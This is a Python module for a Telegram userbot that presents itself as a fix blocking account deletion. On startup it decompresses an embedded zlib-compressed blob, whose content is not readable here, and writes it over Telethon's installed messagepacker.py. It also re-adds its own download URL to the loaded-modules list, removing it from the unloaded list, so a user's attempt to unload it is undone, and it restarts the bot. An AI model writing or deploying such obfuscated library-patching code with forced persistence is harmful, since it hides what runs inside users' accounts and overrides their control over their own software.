# -*- coding: utf-8 -*-

# Author: @mishase

# Module that removes account deletion from Telethon

from .. import loader
import zlib
from os import path

lnk = "https://mishase.dev/f/undar.py"
nf = b'x\x9c\xadWmo\xdb6\x10\xfe\xee_q3\x90\xd9B\x1d\xa1\xd9\xfaa\x0b\xea\x02Y\x9a\xad\x06\x1agK\xd2nX\x1a\xc8\xb4t\xb2\x89\xc8\xa2GRq\xbc_\xbf;\x8az\xb1\xec\xa4\xc30}p\xa2#\xef\xf8\xdc\xc3\xbb\x87\x94\\\xad\x95\xb6 \xcc6\x8f\xa5\xea\xc9\xf25VY\x86\xb1\x95*7\x95\xa9\x194V\x17\xb1\xed\xa5Z\xad \x0cm\x06\xde~\xfb\xf1\x1a\xff*\xd0\xb4\x86\xc2Xi\x0cWh\x8cX`\xacr+d\x8e\xbar\xb8,\xed\xe7\x95\xbd\xebg3\xef\xd9\xac\xe0]z\t\xa6\x10/1~\x18\x1a+,\x06\xa7=\xa0\'\x811\xb8\xf70\x11V8\x93&Srw\xfa\xe6\xde\xbd\xc9\x94\rc\x98\xf7\xbf<\xbd\x9eO\xbf<\xfd\x90\x9c\xf5K_7\x19m\xa1s\xf8Yd\x06;\xf3\x8b\xdf\x7f{\xea\x83\xc8\x13\x18&wo\xee\xe1[8\t\xe0\x9b1\xbcv\xb6\xe4\xee\xc7\xd3\xef\xbe\xbf\x0f3\xb5A=\x0cJ\x17#\x1e1\x01\x9f\x82yi\x19o\xb8\xd5\x05\xf6\xe2L\x18SQ\xf3\xab\x88\x1fP\x97\x9e\xfd~\xdf\xfd\xbd]J\x03\xe5\xac5\r\x1b\x98y\xdao8\xf3\x19m%\xa8\xc2.\x94\xcc\x170\xab\x193\xb3\xb0\xe7\xdd\x11\xd6\x85^+\x83\xa0R\xb0M4\xfa\xc7*0\xc5\xdaq\xbd.\xac\xe5\x10\xd3n|\x99\xd3\xac\x92\\2\x178r\x0c\xd8%\xe6 6B:\xa7Ti\xe83:L\xfa-\x10\xec\xcc3A\xd1\x8f\x06\xcc\x93\x90\xf1\xb8X\x86\xf68\xa3U \x16\x84l\xa3\x8a,\x819\xc2l\xe6\x96\x85\xe3w\xcd\xee\xcff0<9\xb6\xea\xf8\x84\x98\xcb\x84+\xd3\xa5\\\x070/\xac\x8b\xc5\xcbc\x9a\xcaXb\x1eo\xabt)C;0UD\xc3!\xeb\xd2\xe3\x90S\x172\xa8y">D\x92hZ\x93&\x1b|D-2\xc8\x11\x13s\xda0\\m/ld\x961`\xb3\x12\xd4;z\x04Fq\xaa.\x16\xa1\xd0\xdb5\xe3t\\\xe5h7J?\x80\xa2\x90K\x14\tP!(\xa6\xdf\xfb\x860a\xa0\xce* \xc6\xdc\xd2\xca.\xd0\x9a\xd6\xb4\xb0!\xf2\xb0\x81\xa0\xcb\xed!\x07\xcd[k\xcb\r)\'i\n\xbf=\xaeA\xf2\x8c\x05\xdap\xa7\xa0\xb8\x97\xa2H\xe6\xd2F\xd1\xd0`\x96\x8e\xca&\x1aA\xa6\x16\x0b\xd4&hJ\x97\x87\xc3\xc8\rW\xbd\xd6\x19K\x18\r\x8d\xb5$$t\xb6a\xd0\x99\xe9\xb0\xd1L\xaf=\xe1\xc5#e\xba7\x8b0\xd0\x1c\x8f\xe4.\x8ar\xb1\xc2(\xba\xaf\x91\x8b\xf5\x9a\xea\xa8\x8d\xbb\x05\x97\xfa7W\xf6\x80R\xd4\xad($U\xdbT\xd9\tW\xdf\x8a\x00`r\xa1\xb5\xd2-\x1cHm\xba\xeb\xd5\xca4\xac\xd6w\xc1\x0f\xccrY\x86\x06\xab\xcc\x183>\xd9\x0ef\xb3\x0bZ\xe4\xdba\x17\xb8\xab\xea\x92y\xea\xa2=\xaf\xff\'\x9b\nY\x19\xfd_\xa4\xe36\xcf%Eu\xe52ja\xaa*\x8c\x9fk\xa7q\x06\x86sa\xe3\xe5\x08X\xa1\x03\xceU\xe5T\xcb\x1aV\xa4\xf8\xd4\xa0\xb8"9\xaa\x9a\x9ftQKj\xbc\xc4\xf7$?\x93\xd4)H,\xf2\x18\xb3\xb2\xf9A\xc5q\xa1\rGQy\xb6%z\x1eE&\x13\x1fm\xc3}P\xeaN\x1d\xc4\x0b\xd7pJ\x8b\x8f\x80\x7f\x83\xba\x81K1&\xe5\x96\xb9\xb1\x94mx0\x1d_Y-\xee\x0e\x91Z\xb2\x15g(\xda[\xe0xc\xa9\xdc\x99\xc5\x86\xd6\xa4y\x91\xa6\xc8\xa7\x17u\xc6O[\xda\x8d\xc9U{\x94I\xa4\xc1\xbb\xfb\xa6]\xe4\xdf\xdcw\xafk\xc3f)3\xdc\xe9J\xd6\x85\x0c\xf3r\x0b\x02x;\xde;\x82\xc3\xcb\xb3?&\x97\x9f.\xa3\x8f\x17\xd3_n?tr\xaa\xda\xbeU0kE\x95\x96\xdaNv\x0e\xcb\xab\xb1[\xac9\x90\x03x\xd5\x88xx3\xf9\xf3"\xba\xfa|q\xfd\xe1\xe2\xec\xfd\x8e7q\xeb\x02\xbc\x84\x8f\xbdw\xd1\xd5\x08\xc3\x95YD2\xa9\x81\x96\xc6\x8d\xa6r\x88\x18F$L\xe4\x15q\xb8\x17\xa1\xa1~\xd4\xbaJ\x8cH\x9d\xb9\x1c\xb8\xe8|B^uG\xcd\xb5\'\x18\x1d\x8c&R\x8b\x9a\xf0\x8cK?\xf7ZA\xe4L\x1b\xab\xebMW\x8d{\x81\x82=\x8b\xdb\xc3\x17\xd4\xc7\xd1Q)()\xf0\xbcX\x0c\x07g\xc6\xc8\x05\xd7vM\xd1Q\xc2\x87\xfe\x11\xf5\xe5\xd1S08\x9c\xc1s\x0cW\x0cy*\xc2(r\x17\x89(\n+\x99\xfez<\x99\xec\xf2\x19\xecg\xc1\xf7F\x99\x17\xd8\xad\x11\xc7\xc0\x81\x1a\xd8\x13gW\xa0\xcfP4\xa7\xe6{8\xd0\xb9L\xdaF\xe8\x9c\x0e\xd8\xfd"\x19\xf8\xb2\xa4\x0b\xd86St\x80\xb34\x1f\xf9\x1b\x94\xa2\xc3\x8aN\xe5\xe1Q\x12\xb8\x86#\xa5b\xa5\xe0\xab\x01\t\xf2\x01\x8a\xbfJb\xb7\x8dv"\x04\xfb-\x1a\xa6\x05I\x18\xb2JG\xf8\x14\xa3\xbby\xecg\xf1Yd\x05\x96\xc7\xc3\xc0\x97p\x9d\x90\xcfd.\x17\x83\xe0@k\xb7e\xc6+\xe1\x81\xdd\xf0\xd7\xdaFd\xdb>-\x1dz\x07\'\xbb\x8e\x9c\xa5\xbb^\xf0\x87F\xc8\xf7\xc8\x03{\xf0v"\x07\xa3}\x818\xbf\x9a\xde\xdc^\x7f:\xbf\xbd\xba\x8e&\xefG\xaduvi#-*\xfb<\xa4\x83\xeb\x91\xa9\xe8h\xd8\xcb\x02\xccO\xfdA\xf3\x9f\xd5\xa6R\x9aRc8\x1e\x95H\xe4.\xb5\x98\x8c\x9b\x0f\x84\x1a\xf5\xce\x9b\xbb\x10\xf0\xd1\xf6\\\'\x84\x1d\x84\xed\xd7z\xb6\'\xfby2\xfc6\xb6\xce\xed\xde?\xb5N+\xdf'

@loader.tds
class unDARMod(loader.Module):
	"""Removes DAR"""

	strings = {
		"name": "unDAR"
	}

	async def client_ready(self, client, db):
		uf = zlib.decompress(nf)
		paths = __import__("telethon").__path__
		r = False
		for p in paths:
			pt = path.join(p, "extensions", "messagepacker.py")
			f = open(pt, "rb")
			if f.read() != uf:
				r = True
				f.close()
				f = open(pt, "wb")
				f.write(uf)
				f.close()
		l = db.get("friendly-telegram.modules.loader", "unloaded_modules", [])
		if lnk in l:
			l.remove(lnk)
			db.set("friendly-telegram.modules.loader", "unloaded_modules", l)
		l = db.get("friendly-telegram.modules.loader", "loaded_modules", [])
		if lnk in l:
			l.remove(lnk)
		l.insert(0, lnk)
		db.set("friendly-telegram.modules.loader", "loaded_modules", l)
		if r:
			await self.allmodules.commands["restart"](await client.send_message("me", "Restarting"))
